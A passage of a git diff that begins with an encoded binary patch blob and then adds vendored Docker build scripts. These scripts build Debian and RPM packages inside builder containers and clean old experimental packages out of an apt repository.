zFp+yS<7f86Q<`#AFhw@V*v$pU%V-AF@dxRwJj|!H4t#L#nuGJiVu^85#9}O+moj#9 z!SQ@zas5F$D-XAz<1P=*U2|~IcvhTil5|Zf`AmD1Qi^hRYNR2}DUD;!PDjk~LqJ?x zJ6u4fx;9C6fzm4^Aap*MtgEN-9;7rM3J7CdKwQmY2c@}$tg+z&Qr+0W1;=YBjfVol z7#9#%vsg-L@_e|Rp%%yMLy;}{vpK1DY(;Mo(QJ6z|KW_U&tNgCzRobF7 zmY?)y%TGp<9YOYUvRlcXB%4X$lgVBn%j@NUk>&kk7s;lPzq@3Qko}2l0@=P~d6$OZ z2F(z`s{k1Q0T6IBft>vOQ!2TFFZ6Mm(K1H=7h#s4iHQ6w-_B?BO6NTFb zWP6bstiCSAl00w5q50U8JSpSGBBZhJFz zH!G8+=em5%+S+WNrT`194P=df2#7Vb;1>iyKr#fV8|y+wZZ4mxc~9M`Vw{{Bh8UfIxDWFBp#cc6}cf^2#A3M zen9{P+>XGV9@W-UE99ah3P$^+uxsgQe8)ydMCZ&n&Qs)Lotc0kZU~5h1b#sP1l*E9 zR(|dfM?CU*%Y(N-L~i)N%m8YA+;c@fAt0`xj5I(11Oy{Mt&nXrZt;gb8Mu>~A%#J6 zUc{j!9)H?XR%^mSK&+t!zaRhtk|aQ%5$r-!ZfzP+PR`C^_pX$MuXm(jDW>TCNF}U-cfZLOJEEF;`5D+2hBW(}>0YL~{f2K+}b!YujRN^->(phF+Zc&%S z;sRH_SJ3S|}J1o>3m`!r=&geHaZ#6MU3l$gYWb3zM* zQ-A>h5D+1O1g*nIhpFiyr>4jEq#y%iOjfASDb)1fD+Wbo_(#*{k^PX=qNauN+LAd)Z;5J^-MG6@18 zU=0Bhj*2R|d?^V>C%H^kly)%M?_IaxLo3V{yH}_@yUA`Pn@FO;zW^mUBeMoxG4&w1 zLJOARm4`zq?F0JsdDE0n81y2mA}T_%T4bKQDxQ?9MZol5BH*ff6|{D!W+`$>G5<8 z;rR<9?+@mNv*C;k{5U(Ft|3i2e87T-;bD0mcw9S(MH~8kV2H(eI;l?95WXn>hVZ;h z+@G4PH(6ePhAswE{`@-kXDEw-A33owVsVfk=*-H)W9j!}{h1-pw$!S#N?Hob(^|CP<01j#ag`&>8Cz=j-x6Q6ab9oF z(C;C#2gNd`Va@ZO^8JY6H#Lkf1o#8O*zku9x5mcsP%^mjhZ462!yk&KehlJc@MG?` zsPLxo@jn>jKN|jrWa`Ht5{9(6aGClsTr29=G&~mtZViTulxcjX{EAA`Ac}@~%>5P> z-ZV`vaK?uJ{h0bO|VlgZxW3)CHRr-WprUlw(5{^5C8#72$WrWDNG@k zk5bCyok%nuvqm%w@fUoPHq~13xJKcBHpGG7M+u+{>rp0f0Ra#YkN~wZno}#|1zPmi zhFTg=(4e^Sc$n2WGl)l)^_yHRrq&0aC;?Lp0SHJjVBib_AmCgABoq~CyqnLKicl~a zZ)MaW!6-xGVLC8vb4Co}VZ#oIeDIu)kHMHB;JE^_{A6X~(%cN2M=k}bH8p9bNBKuC zzySn6;86lHR+_d9QPZ5La%9WUGJrr5i?U<`6f(KDBZcD8#A&{{{=*(NhzE~uGqpa> z6%{Ys9un|e0b#5yVfgMLijt2s3MKPbna;E=IUIa|00_92fSuyOGyAb?b1co&9M)8n zVDZaJFwe*`2!KEd1RNk9$0&)-B_xB(M8J~;qyp{$5C8%9BH#e=;6P?m_Z1%lfhmE2 zCwF0)t{5%>6)uAS2#A@0jq5y2i*%bDzBP5kdC>$sSwJjWxmq+fxPkx(h>3u1dlFh< z&NoQ3)6ApR2j6oJ#sUJKEFi{vN?Cx4dqJz#LQwDq0xl!KH%8=pTk&5z4c~syP^PYl7`i9;m#;`c=x_l$eMm@!5K-}6{p#oH91VF%Y0;xIK zy5@)3KT6A^<34#4GUrW@qCOZS7(;p%@-M#qNS6PK)`&tt z_O4%bl?ZhwyNbZMsyV_x9cGoW@Ee#`#R<=a324q9WTn=9!erT=H=RFV}aHD5lOG=l2c5_1wkIklzdbyMAP{oUB4wm1m~1 z(rf;YrH6H9X-&E^t;*0yFXYXwPxt~4E*^#@=7HBvv08gpk$BKOlXRJ#iRjPLO7l-M z*lhUH^RqUGc2Gci&hb{p+hoU+HGQdnj@*7HD@r5yhtUaM4I*=tY;jFB-Um2|?Dr%j zyfy0>v;5>Nis&_KBdg{Y!05vu76;?qFus5P!o2@Yq^}ehJs{68%cS0~bf$Ri(aktiDhOxnCo^q+xua3K?Q^W@&WTivP~_Zz(s~n zwOc_j^DOXh-plfnQ^>;%^PV2PTFKj&`C9N{5apdK%=_?m=5_K9#vhi&8Quy>i5kfA z0?QZY#jV^G$+vYaFz=(gtRLf`2L=~h{zjhf6DUb8^7Q-6_n%GlLa~EhD6G4U^Syjo z=2NX$#*;1G`hH2HzZcz1D{Ap;Qt#@7qx6*%#nyK|eXQqpjZk)-1lEcc$(tk|f=u0| z=N@lm^d-xmL7~MK?BNC8trh8vo*2mr2tni@y za{3?Y=eNIKUrP^+%zEK0qhVW?Tc(O6=qQt}G4CUZI`NcI7mU3or*bWpRjV<}su{}i z{L9!IooK?}rGfG!nr+2}qso7~Sw;Q=W`)ouR|wLHNfN!7<#_oOSFY=Hfww-K(KTLN znv9-#{APWL>~ONxi}hIah27-bkDhrqioR@{t0V=4KyuOenyj@DjVbZ&tVFV0gnlNl z=jqpSv;1T?^8B;q0SbKb&k|OkR*23}pS|+dC8oY|lBqBLtNXQY4!?|LS8u>F>a}3m zK@BC_UBUbFxlpJtpCB$r8E=g_%j8t4%`)q@V41ZVF|Ec`Gr%n?4WEkab$UNdn%GAJ z;#Ry+SQh;QU%6$gvg~U0$<||BShT95UvM4-5a9v;W4@hwkEzZdVdc;4XQeM6Cl~H& zqoFUZ->+DM-K$!UCDU&jy=d?*FTEK`;<3nZ;>=%q*70W?f7bLN+m`HuOwh5l<}w9% zk)Cyl)&?xjzoZ0&U_MR-nMQVSaRsu&{S1XoB)f;~-(>$I(8a&%EkD_W{QO1MLc^QW z_gJa>H(15gJ2Xq^0zD*8(Ru~mMd^6M2Til9Jz4Nzp#J~7QWYGZhy!Be-E+!2mvutQ zCkUv>DsR($ZZaV5fTYYvL9Mv#s&!Zv2`}fCSGtmU|4zEfXH==_;ioxwm_*|wlR0L# zkmb3h2WM`%$5>AJ>MXZ>HL{Ph+_H~}_GN@m-Bw=yk7>^yW&y-YPHSPDVe;tjDY-%o zmKjj)TBYNAM#;4KhbW!1^o+1Wr3&Yio^MKWsZX{s*$A?&$krw6Xv1H=-=w@>v^Qc& z2nc~~Km{F5Hkz!fMgemvE#6(pciZXi8S2VY-nmLI8N`gHY74y9 zCzW!4mh2_H=`7t-VS!Zb45j4hUb8ySwRCw3a6J%?Xb=C8YzZ@?i z`xyzzVfwYnh*m&IG+T(z$;4k&I1}#1?-|{FLt{=_dePGI$s=<9lC3wy#d!KL=OO33_%FYI_=g9!B}!p6ltcQzd#MQDkmVDMteRCODghzUXh?;4T5ow1&hq)L@Ko9NKlTO zX33=j649d{UslfthFa@?c^@DQ2!H?xfPnZ3+@dV*Buk5sbfR)-&$^X%O(GC0`cr8pj^Ji*80}w@JU`UAOHep3D9ct{L~C##Dizd+h;Gt!)y)Nb=ww-=9x^T;&Z*NHrkv#n}o;egb)A(BuGG;MO{`Yv{Q)j2BNMmhmX%lHX`D#tCRJl z^gLTYcugynd?Ard2HjXTVM8FP6G+fbHD3fnzg4;bgC52?^Y#6k4G;gq*a^puCjb>u zD7V{+Rhx~$5L?+Hocj^r{Z@I&X-x39E0rpXX}mhRA7Sy82m+!|EU~p(bblx|45HYY z9>RfuSPAfHRt5c5)(TQ%2xIC#JUiw%;>`6p%?IVCO5CgwC+i$Y0EStYht_Y-WXv%2-4+aF>kpORXq|;c37-t^( z`0in&TH(79Hr#g@1F->GkwH}IUy5|M&@mrlAr_K?H>nZevki6AbHykg8ch;YtJ_MA zsk`JCU08;iRHb zy24DBqWHML4FY0-9M|k5y~$YhNiRcC-7o)RqisiFK)@XcXtQaC6(8#mW2=J$=IcFt z{bFgi#FOs8TdHM%fEd@DT5Z?9&wN^=DBskK%ZOtTFh_u|>)>1H@|_UHGQ+B<{QCMW zrL9Vq7Ig`3t|Nd!bYs?E{8f(KyL*#%fwOruT&7krxv!UTtR8pF;XPT}o7MK$Fn_gz zC1>Zc6ZbRONwP5FC7}Co2X94-SvWX8AKK??RI8@qB`KYp**l010Wq!XPj?<=8R_*+ zovk^S(-)^?9{9y6Idv=as$Pl>t5=>?^nP@8{)N_%*Q8)4GX_1h3rZpj}Q=N)Y9zj$t*j|-=3&FX^$)gwLBKJ3Sy1Q7KrA) zJ$u>4pEt1U*RJUhDwRq$>5VC@dQkNTNVi>0W)uIogqFwyBCb8)qM`fFtk}D&3|JJ3 zJQ_3)r*V(J3{Lp9pMbprfOiCUvM6V3+;o4OVx0PDO(87w`+V&(55(h}B}>_t zi@tau9z2RR?b;O*5AN2!N&xFxEs!6=xR8MEQ-SogC%!09^kW?cE^@h+`T4&9@h|`p z&o2a|sJc)nCe!yY?c3mrcMs4UdUrQ!T74f=r(gm9j_rwT*N&Z!6uE4%L&wm0<*Ij0bcldEF0SHJ@y!rQTy?uTv>XJ2X zy1_{|UmMc2ye|u+nO3|hykY&%MdIOITDkNgd4oB6l`-5>y$FI}P; z(07ZB>B9N*?7itT*oJlMb=_N^d_0@+0d{VlEahEf7&zKbz_9V5q{cdoi|yzC6@A!z zvau76#YI3VuIz{?H$$5zvAMf9u+&t$KTgBD4io`2z|5QDZf4483T~m~`^jcYcIo0p z#;w8JCjkkd*;%Ei^#bEq0=kwjpIs&87Z+dOpV=!dhd7oDVskVBw{L+YXs6oAOsN`d z_kak`f_{mwow*TZ@O!jUkQ-mWhjVx>$*8X{ZDC9%CC9$;CQH)t7(X;OTDO#3YJ(l7 z73Ax;m5pp=_uHFkv^aM>0k>BXyO8mwh_}yTyW-FX=C6dh=`W6mOhj>#647QmD*U!IjITSgb|RB}Oh5fw>#SN#DwJ$VMD|0zMzrbSJa-W~y#gphBTw9lLb4sAyfEd0OZ1PF61a_inmHVc@9< z0(^Q^dX|3YLkW(On-$Zw) zSxkxHEK&m45X;hvnUi>(Wo1^h)O$((_^yk5_eFOwK1w~{4Yv~xUUWWR7gMe*xCxx&1p?w6u0_ZC z`R=tWEwx9{7j1KOClTQ-k=VNB+4Hr^GL7QVdCO_k-SySU+wAL8w^=q?9wpx}d~lq% zIOq#cZntw7pV#i|_aTYLt0jYg4`&g8fH;e6QSr{-t6>=#Nh~MZvgt-e#ZiQt+*`wB zUg{#Qh`@=uN)$3hhFq!MDpx39q88X=IoTP1(xa`|Wq`gUBrPlYv)Ta~7C?(VcuRwS z5MTB}(`j9d^BPB;mn_xH3T3auHjrbmASirqGjs63Om|=ru&$P zAHCSSa@jg{CCO#-TxwlhlgpLcWD1>N+$*UxszrMpLy$K3RnL;tmQEjVw1WM!miNO>HVMURWfod?E? zs!WaMI#X-HNIb3=bs28bB!F31w$|H%ePJ}M_h))Ady%F2t6CM)<|}9(tDMg5ezKN0 zE~1;oN&ggdIdOHML}j@$nLJY_m*1n~n@lc0M8|6~UJfgIuUs3-?!EM2hup064f!&y zNC$0fD3l9>=r*h3Gpe!+^$NN$2LdGJ>l-MU1eHX zGPNR(()BYmE^);uj8hN2mmY}C&&f{6%ge2zmGdDI7^?_S>yLL+vRq|-0QpA8LE{$FSruPU_yz2qMrxz1K!DAA(Y&}-SPo$3T@2y-vOEb+A)e9tr9MMcLRX*8N!wEa&6&9uTzBk~)-UI8im zq!4*wkv-c9Y(IbXi5)jHMyX`7j+K0r)hl_cyvup3WZoneCG|;F^3|}&ioR_3jWpXc z;Lag+T~ss$m(Qk>@`pGaQAfVMTbN4Sg$Bz#R6QL5Q95y83`9D0^+-s?x{RQjtGGL2F}6Q)X%iASO@Uwvd}g zpK#HjZ<**s!=2Y{SX#;a6P~_)6R68-wxvPfPj~|Mwm={t4ywc7PMr(P%+vlxkLfVJ zO-DwaR!gg{^K)q%ql{c_9=Y-1(_Ff)n?FU{deH1yS-y-$(&^!@n@LNLBsrgL%d^C% zRe961pC3`HK~9UimEN?vPbFt^H3bONC}rjSePtT8>n1~u+k2jEzwW`U5S?i7mIhh= zp?6(PI_L(Hax@yR8_dhA4Ru)^mvS*YG4Bu%5!E`0h|i6Ty!{ou6?I*eE&d%2UoS7_ z3L&{k-=65S$-}y}4c$|Gl{i`&g>P%#s`d5zmiDuHvG4_)NriyD0)p>>IIyPMJy9c_ z#G}!rwA@n;jMi*ad3kv(IW3Ldp%0CxXJ%4+#(A&B6?`;oKn>Gb$7Zu9$%|TI%2$Tx z)2Ctc?xpI!Bnj~_sY;bPmH7vBf_Rv4@vu{LVL73~sU@O5m7H_ri2zj{Cq!>HO8%`4 zwMxajsB4S=I@+YuTX@vQlkW8$4@1`!AJgEi3@3`PqwB*sz69-5<5MRd^QMQ7?^gO$ zXLlMccgW{DotRrhT>=4n-#VcpB>=YdGAW7TU{coKp=C6ow#H#^IQ|h14Jirl<5DRd zH|uWG#UwWApKJDJPq^@0HE7C|ZrT)A4r+G5SU^CnPGR0Y18KlxqXoX5Sx)H+e=#Y9D;@q9$y z8gqkI7LJ* z98?`jWe)T4na+ksOm|R>h(?42ARr>Fl;W~9WYghZ9V>gUuIQ~4QCpyrvpHgg& z2LUBP00JV3YI>N-*iDD(gqGGEu3uWix8s$(IdLzOjoEdX(W*(^_Y7$fWWiUl%=Xuj zXYQYigT8x7cO&b?Lh?|gS^#gKGfb`K!f{ZlML@o-BLD%hj+ZEWPfa|m&SLTtovQi< zi6TRGW@7Exdu+}jfx5En%sYY;0gWb!c0e3S!m$iIJc|GXM8fqQv-$9%-qn0##X2rx z4chnrxz2vQh<)F!VJ5g=l`5Tt<8AtA$1K6~f(!^k00JTicE=?ev-wEJ@N(*nHT~6& zTd3i<>{%RBE{$1C{QVL;d^^M9Fz_f40hKC?gkuiPl6W0k=L%E@B1skkB9e-*CmSE_ zJ?eEmOM9eq72n!shYsvX#06oKv-8-f9T(Z<)NB`|h9s;epd{h&_FBjk%JEpwVKqIs z3;+RfqiTJ5)8WaTD|x?5AMKFLEG<*~H`8<2=$#kYtqiO;Gi4*#xk{bJyfmNDEVeh; z$W~Z(FIYv0FJTCX`0B*29L?HutV~uu+aFocySiNw2^jc7N;Vs}>ms|Cg=dw3)xZbG z@6sZ`59mW3?+Ka@BraM45D?K;jeQv#y7kDIh_afG9`{pOw?y2&WE~dzTyhqhu=^53 z#9>4&jEMJvdU>6uPXoS5!hu;;7Gm>MZx9eSuKBO_pHTmolDoNWMeo)ch4gy0AR;cj zIr(P+y}WkN0>Du;9ru_EQ$|t}CIA7EaOGK=^_lyQH_9z<8>A6%M6wHUS8Tvk8kR{xQG(`&_*M)xvs#YF`m$ ztHi9_&B|qy_grD8Xw^E50|@ZehQ@0jZL9nS8y24EfEW>lhZ2B*cwoi9z30DiK|acN zAM;guNu~H1x%q6y-`CilYj{bvsm}P=hQ{kMZK1q`wttyHp96#%+XNDUj0r$MjA?k# zF@3N~w*5xtq-x&sw`vEdy`@lezWvo#$8NLlPTbLLg(ZbN3!X=f<_-;rucj`lX*9NR zMezI}18zkC0^(NHX^&Y`PA&gG`i^dC+hTBSs9jf6*!%mhv$P!AZ5O660p8M3 ztM8I%Y@%(CXHXZ_zlA;E3*VFU92ri|n?=8~rju;^GLG|f> zU1i4|y%oG60V)0JL_>3px~G0-O64pX3_l~K>?5zzB_LG+NzhJ}E_6xcocg!|cHheU zxQ4ItxvDoK$&ocb0O=|UVntQu~_QC&z`lzrSrDxp%qA0CY zRYVlIbOk`+_1eS$SIa<*{3A^_hDt zPyeMU5oOQ%tjOj0G?;ON`lbFPyPWI_7SjYPVyq{L5Kbfj0dXQ+ca55h$*Gjwc9+s~ z{#VUg(X6(=+MD;qi@}_|pT%a=7pnffBeA{VRjN$tjyg|Mrhcc7|NcmOiEI%APvijv z%n^Wqn4^Ph77-vpDZBetR=iTC9az;{5%id^N+qz6v`~7RNSIg#c3v2kXXoeFc}HP(B|nb%?lC(0VffF zfH(;(qAg6||NcBt>&U(AI6sA~bvcc^R%LHRDVpJ>a>X}!lc*K)_3=Awl1ThP?tik_rdbY43lV{U2nj$yL|7@Fl%;Wr$Eu!7&FSZ( zkTvsD%IXBFWR**)rtnuOWHeyUln!XX+@vp6@ulp)6elFS)xZa@WwKoQ z%_1R4qu={%?W61<00JOj2LT9(9qI5JlQm;Ye9|S-E1Oy@g z0TBp1k_7<}00F5JfPhH729bXd009sXhyVmcAn-^Q1V8`;q)q?=BJ~!3mK51f)&?0wVPqME*el1VBI_ z0uT^^z#~}@009t?IspiX)N2s=2LTWO0f7iWKm-DhWI+G~KtSpQARtn&LF69DM7j00JNY0)h~LfCz#ei3(33K|59WOdtm!AbkQ*5$V?dd5|BF?0XxIq8}K){U& zKtSBMa#1u8009tiCIJYDGwC935C8!XaAN`x5I3$|6b%GG00f*#00QDnx`-PDKmY{X zm;eOCjVl*L0|5{K0cR3`fH;#b;syZ_00B2900D91%0!3m zz>Nt&K-{=;Q8W+$0T6H|0SJgQ=^}0r009tiV*(HmH?CY14Fo^{1e{3#0^&@%h#Lez z00i8a00hL1D;Grr0T2KIXA*#bIFl~o1_2NN0XHT90deEXMbSV21VF%<1Rx;Jq>H#g z00cn5jR`0T6Iw0uT^4u3Qui1V8`;oJjxz;!L`T z+j;^C+NstDLI@B50l^4BMFc~Sgh2oVKtS3AARyANKja<+KmY^;BLD#r3_TJC0T2KI zX%m2eNW1=!dk_Et5D<(21Vk|ONEie_00g8>00JWI`a|wP00cllFai(|!O$aN5C8!X zkTwAbh_veuxd#Cd00F@WKtKdTkAy)01VBLA1Rx;Nu0P}+1V8`;1S0?e5ez*N1_2NN z0cjI}fJnRkkb4jS0T2+300cxZ^hg*4KmY`!O#lKS?fOIRK>!3mKrjLj5W&zRVGsZT z5Rf(j2#B=n54i^c5C8$e2tYstLyv?(00cll+5{jV(yl+`9t1!D1Oy`h0TB#65(WVf z00C(efPhH5{*ZeR00D^-nB6gcvqZCAINMN>!aQ&W0w4eaAYdT@2#AHC;0**o00cmw zFaZciVIDXG0T2KI5U`K{1jIs6@CE`P00JOTm;eN%Fb|x800@8p2v|q}0%9R3cmn|t z009svOaKB>m 1.5.0~rc1 > 1.5.0~git20150128.112847.17e840a > 1.5.0~dev~git20150128.112847.17e840a + fi + + debSource="$(awk -F ': ' '$1 == "Source" { print $2; exit }' hack/make/.build-deb/control)" + debMaintainer="$(awk -F ': ' '$1 == "Maintainer" { print $2; exit }' hack/make/.build-deb/control)" + debDate="$(date --rfc-2822)" + + # if go-md2man is available, pre-generate the man pages + make manpages + + builderDir="contrib/builder/deb/${PACKAGE_ARCH}" + pkgs=( $(find "${builderDir}/"*/ -type d) ) + if [ ! -z "$DOCKER_BUILD_PKGS" ]; then + pkgs=() + for p in $DOCKER_BUILD_PKGS; do + pkgs+=( "$builderDir/$p" ) + done + fi + for dir in "${pkgs[@]}"; do + [ -d "$dir" ] || { echo >&2 "skipping nonexistent $dir"; continue; } + version="$(basename "$dir")" + suite="${version##*-}" + + image="dockercore/builder-deb:$version" + if ! docker inspect "$image" &> /dev/null; then + ( + # Add the APT_MIRROR args only if the consuming Dockerfile uses it + # Otherwise this will cause the build to fail + if [ "$(grep 'ARG APT_MIRROR=' $dir/Dockerfile)" ] && [ "$BUILD_APT_MIRROR" ]; then + DOCKER_BUILD_ARGS="$DOCKER_BUILD_ARGS $BUILD_APT_MIRROR" + fi + set -x && docker build ${DOCKER_BUILD_ARGS} -t "$image" "$dir" + ) + fi + + mkdir -p "$DEST/$version" + cat > "$DEST/$version/Dockerfile.build" <<-EOF + FROM $image + WORKDIR /usr/src/docker + COPY . /usr/src/docker + ENV DOCKER_GITCOMMIT $GITCOMMIT + RUN mkdir -p /go/src/github.com/docker && mkdir -p /go/src/github.com/opencontainers \ + && ln -snf /usr/src/docker /go/src/github.com/docker/docker + EOF + + cat >> "$DEST/$version/Dockerfile.build" <<-EOF + # Install runc, containerd, proxy and tini + RUN ./hack/dockerfile/install-binaries.sh runc-dynamic containerd-dynamic proxy-dynamic tini + EOF + cat >> "$DEST/$version/Dockerfile.build" <<-EOF + RUN cp -aL hack/make/.build-deb debian + RUN { echo '$debSource (${debVersion}-0~${version}) $suite; urgency=low'; echo; echo ' * Version: $VERSION'; echo; echo " -- $debMaintainer $debDate"; } > debian/changelog && cat >&2 debian/changelog + RUN dpkg-buildpackage -uc -us -I.git + EOF + tempImage="docker-temp/build-deb:$version" + ( set -x && docker build -t "$tempImage" -f "$DEST/$version/Dockerfile.build" . ) + docker run --rm "$tempImage" bash -c 'cd .. && tar -c *_*' | tar -xvC "$DEST/$version" + docker rmi "$tempImage" + done + + bundle .integration-daemon-stop +) 2>&1 | tee -a "$DEST/test.log" diff --git a/vendor/github.com/docker/docker/hack/make/build-integration-test-binary b/vendor/github.com/docker/docker/hack/make/build-integration-test-binary new file mode 100644 index 0000000000..2039be416f --- /dev/null +++ b/vendor/github.com/docker/docker/hack/make/build-integration-test-binary @@ -0,0 +1,11 @@ +#!/bin/bash +set -e + +rm -rf "$DEST" +DEST="$DEST/../test-integration-cli" + +if [ -z $DOCKER_INTEGRATION_TESTS_VERIFIED ]; then + source ${MAKEDIR}/.integration-test-helpers + ensure_test_dir integration-cli "$DEST/test.main" + export DOCKER_INTEGRATION_TESTS_VERIFIED=1 +fi diff --git a/vendor/github.com/docker/docker/hack/make/build-rpm b/vendor/github.com/docker/docker/hack/make/build-rpm new file mode 100644 index 0000000000..7fec059392 --- /dev/null +++ b/vendor/github.com/docker/docker/hack/make/build-rpm @@ -0,0 +1,148 @@ +#!/bin/bash +set -e + +# subshell so that we can export PATH and TZ without breaking other things +( + export TZ=UTC # make sure our "date" variables are UTC-based + + source "$(dirname "$BASH_SOURCE")/.integration-daemon-start" + source "$(dirname "$BASH_SOURCE")/.detect-daemon-osarch" + + # TODO consider using frozen images for the dockercore/builder-rpm tags + + rpmName=docker-engine + rpmVersion="$VERSION" + rpmRelease=1 + + # rpmRelease versioning is as follows + # Docker 1.7.0: version=1.7.0, release=1 + # Docker 1.7.0-rc1: version=1.7.0, release=0.1.rc1 + # Docker 1.7.0-cs1: version=1.7.0.cs1, release=1 + # Docker 1.7.0-cs1-rc1: version=1.7.0.cs1, release=0.1.rc1 + # Docker 1.7.0-dev nightly: version=1.7.0, release=0.0.YYYYMMDD.HHMMSS.gitHASH + + # if we have a "-rc*" suffix, set appropriate release + if [[ "$rpmVersion" =~ .*-rc[0-9]+$ ]] ; then + rcVersion=${rpmVersion#*-rc} + rpmVersion=${rpmVersion%-rc*} + rpmRelease="0.${rcVersion}.rc${rcVersion}" + fi + + DOCKER_GITCOMMIT=$(git rev-parse --short HEAD) + if [ -n "$(git status --porcelain --untracked-files=no)" ]; then + DOCKER_GITCOMMIT="$DOCKER_GITCOMMIT-unsupported" + fi + + # if we have a "-dev" suffix or have change in Git, let's make this package version more complex so it works better + if [[ "$rpmVersion" == *-dev ]] || [ -n "$(git status --porcelain)" ]; then + gitUnix="$(git log -1 --pretty='%at')" + gitDate="$(date --date "@$gitUnix" +'%Y%m%d.%H%M%S')" + gitCommit="$(git log -1 --pretty='%h')" + gitVersion="${gitDate}.git${gitCommit}" + # gitVersion is now something like '20150128.112847.17e840a' + rpmVersion="${rpmVersion%-dev}" + rpmRelease="0.0.$gitVersion" + fi + + # Replace any other dashes with periods + rpmVersion="${rpmVersion/-/.}" + + rpmPackager="$(awk -F ': ' '$1 == "Packager" { print $2; exit }' hack/make/.build-rpm/${rpmName}.spec)" + rpmDate="$(date +'%a %b %d %Y')" + + # if go-md2man is available, pre-generate the man pages + make manpages + + # Convert the CHANGELOG.md file into RPM changelog format + VERSION_REGEX="^\W\W (.*) \((.*)\)$" + ENTRY_REGEX="^[-+*] (.*)$" + while read -r line || [[ -n "$line" ]]; do + if [ -z "$line" ]; then continue; fi + if [[ "$line" =~ $VERSION_REGEX ]]; then + echo >> contrib/builder/rpm/${PACKAGE_ARCH}/changelog + echo "* `date -d ${BASH_REMATCH[2]} '+%a %b %d %Y'` ${rpmPackager} - ${BASH_REMATCH[1]}" >> contrib/builder/rpm/${PACKAGE_ARCH}/changelog + fi + if [[ "$line" =~ $ENTRY_REGEX ]]; then + echo "- ${BASH_REMATCH[1]//\`}" >> contrib/builder/rpm/${PACKAGE_ARCH}/changelog + fi + done < CHANGELOG.md + + builderDir="contrib/builder/rpm/${PACKAGE_ARCH}" + pkgs=( $(find "${builderDir}/"*/ -type d) ) + if [ ! -z "$DOCKER_BUILD_PKGS" ]; then + pkgs=() + for p in $DOCKER_BUILD_PKGS; do + pkgs+=( "$builderDir/$p" ) + done + fi + for dir in "${pkgs[@]}"; do + [ -d "$dir" ] || { echo >&2 "skipping nonexistent $dir"; continue; } + version="$(basename "$dir")" + suite="${version##*-}" + + image="dockercore/builder-rpm:$version" + if ! docker inspect "$image" &> /dev/null; then + ( set -x && docker build ${DOCKER_BUILD_ARGS} -t "$image" "$dir" ) + fi + + mkdir -p "$DEST/$version" + cat > "$DEST/$version/Dockerfile.build" <<-EOF + FROM $image + COPY . /usr/src/${rpmName} + WORKDIR /usr/src/${rpmName} + RUN mkdir -p /go/src/github.com/docker && mkdir -p /go/src/github.com/opencontainers + EOF + + cat >> "$DEST/$version/Dockerfile.build" <<-EOF + # Install runc, containerd, proxy and tini + RUN TMP_GOPATH="/go" ./hack/dockerfile/install-binaries.sh runc-dynamic containerd-dynamic proxy-dynamic tini + EOF + if [[ "$VERSION" == *-dev ]] || [ -n "$(git status --porcelain)" ]; then + echo 'ENV DOCKER_EXPERIMENTAL 1' >> "$DEST/$version/Dockerfile.build" + fi + cat >> "$DEST/$version/Dockerfile.build" <<-EOF + RUN mkdir -p /root/rpmbuild/SOURCES \ + && echo '%_topdir /root/rpmbuild' > /root/.rpmmacros + WORKDIR /root/rpmbuild + RUN ln -sfv /usr/src/${rpmName}/hack/make/.build-rpm SPECS + WORKDIR /root/rpmbuild/SPECS + RUN tar --exclude .git -r -C /usr/src -f /root/rpmbuild/SOURCES/${rpmName}.tar ${rpmName} + RUN tar --exclude .git -r -C /go/src/github.com/docker -f /root/rpmbuild/SOURCES/${rpmName}.tar containerd + RUN tar --exclude .git -r -C /go/src/github.com/docker/libnetwork/cmd -f /root/rpmbuild/SOURCES/${rpmName}.tar proxy + RUN tar --exclude .git -r -C /go/src/github.com/opencontainers -f /root/rpmbuild/SOURCES/${rpmName}.tar runc + RUN tar --exclude .git -r -C /go/ -f /root/rpmbuild/SOURCES/${rpmName}.tar tini + RUN gzip /root/rpmbuild/SOURCES/${rpmName}.tar + RUN { cat /usr/src/${rpmName}/contrib/builder/rpm/${PACKAGE_ARCH}/changelog; } >> ${rpmName}.spec && tail >&2 ${rpmName}.spec + RUN rpmbuild -ba \ + --define '_gitcommit $DOCKER_GITCOMMIT' \ + --define '_release $rpmRelease' \ + --define '_version $rpmVersion' \ + --define '_origversion $VERSION' \ + --define '_experimental ${DOCKER_EXPERIMENTAL:-0}' \ + ${rpmName}.spec + EOF + # selinux policy referencing systemd things won't work on non-systemd versions + # of centos or rhel, which we don't support anyways + if [ "${suite%.*}" -gt 6 ] && [[ "$version" != opensuse* ]]; then + selinuxDir="selinux" + if [ -d "./contrib/selinux-$version" ]; then + selinuxDir="selinux-${version}" + fi + cat >> "$DEST/$version/Dockerfile.build" <<-EOF + RUN tar -cz -C /usr/src/${rpmName}/contrib/${selinuxDir} -f /root/rpmbuild/SOURCES/${rpmName}-selinux.tar.gz ${rpmName}-selinux + RUN rpmbuild -ba \ + --define '_gitcommit $DOCKER_GITCOMMIT' \ + --define '_release $rpmRelease' \ + --define '_version $rpmVersion' \ + --define '_origversion $VERSION' \ + ${rpmName}-selinux.spec + EOF + fi + tempImage="docker-temp/build-rpm:$version" + ( set -x && docker build -t "$tempImage" -f $DEST/$version/Dockerfile.build . ) + docker run --rm "$tempImage" bash -c 'cd /root/rpmbuild && tar -c *RPMS' | tar -xvC "$DEST/$version" + docker rmi "$tempImage" + done + + source "$(dirname "$BASH_SOURCE")/.integration-daemon-stop" +) 2>&1 | tee -a $DEST/test.log diff --git a/vendor/github.com/docker/docker/hack/make/clean-apt-repo b/vendor/github.com/docker/docker/hack/make/clean-apt-repo new file mode 100755 index 0000000000..1c37d98e40 --- /dev/null +++ b/vendor/github.com/docker/docker/hack/make/clean-apt-repo @@ -0,0 +1,43 @@ +#!/bin/bash +set -e + +# This script cleans the experimental pool for the apt repo. +# This is useful when there are a lot of old experimental debs and you only want to keep the most recent. +# + +: ${DOCKER_RELEASE_DIR:=$DEST} +APTDIR=$DOCKER_RELEASE_DIR/apt/repo/pool/experimental +: ${DOCKER_ARCHIVE_DIR:=$DEST/archive} +DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )" + +latest_versions=$(dpkg-scanpackages "$APTDIR" /dev/null 2>/dev/null | awk -F ': ' '$1 == "Filename" { print $2 }') + +# get the latest version +latest_docker_engine_file=$(echo "$latest_versions" | grep docker-engine) +latest_docker_engine_version=$(basename ${latest_docker_engine_file%~*}) + +echo "latest docker-engine version: $latest_docker_engine_version" + +# remove all the files that are not that version in experimental +pool_dir=$(dirname "$latest_docker_engine_file") +old_pkgs=( $(ls "$pool_dir" | grep -v "^${latest_docker_engine_version}" | grep "${latest_docker_engine_version%%~git*}") ) + +echo "${old_pkgs[@]}" + +mkdir -p "$DOCKER_ARCHIVE_DIR" +for old_pkg in "${old_pkgs[@]}"; do + echo "moving ${pool_dir}/${old_pkg} to $DOCKER_ARCHIVE_DIR" + mv "${pool_dir}/${old_pkg}" 